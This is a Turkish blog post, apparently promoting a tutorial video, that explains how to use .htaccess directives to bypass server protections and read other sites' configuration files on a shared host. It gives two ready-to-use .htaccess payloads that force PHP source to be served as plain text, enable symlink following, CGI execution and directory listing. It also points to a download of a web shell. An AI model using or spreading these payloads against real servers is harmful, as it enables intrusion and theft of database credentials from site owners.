.htaccess ile Server Bypass

  • on Ağustos 22, 2020

Merhaba herkese,

Bu sefer ki eğitim videomuz da sizlere sitelerde genelde güvenliği veya sitelere yüklenecek dosya boyutu vb. özellikleri ayarlayabileceğiniz .htaccess dosyası ile sizlere bir server da nasıl bypass edip config okuyabileceğinizi gösterdik.

Genelde bazı sitelerde config yolları gözükse bile okuyamayız ve farklı bir şeyler yapmaya çalışırız. Bizim yaptığımız da bu. “.htaccess” bazen çok fazla iş görüyor ve birçok sunucu da rahatlıkla işinizi görüyor. Video da ki server da 2020 server ve birçok güvenlik fonksiyonu açık olmasına rağmen bypass ettik ve config çekebildik. Sizlerde gösterdiğimiz gibi uygulayarak ne kadar iş yaptığını görebilirsiniz.

Videoyu buradan izleyebilirsiniz.

“.htaccess” kodlarımız:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html

-------------------------------------------

OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php 
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName phpshells.txt

bu .htaccess kodlarından herhangi birisini deneyebilirsiniz. Veya elinizde başka .htaccess kodları varsa onları da deneyebilirsiniz.

Tesla shelli buradan indirebilirsiniz

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir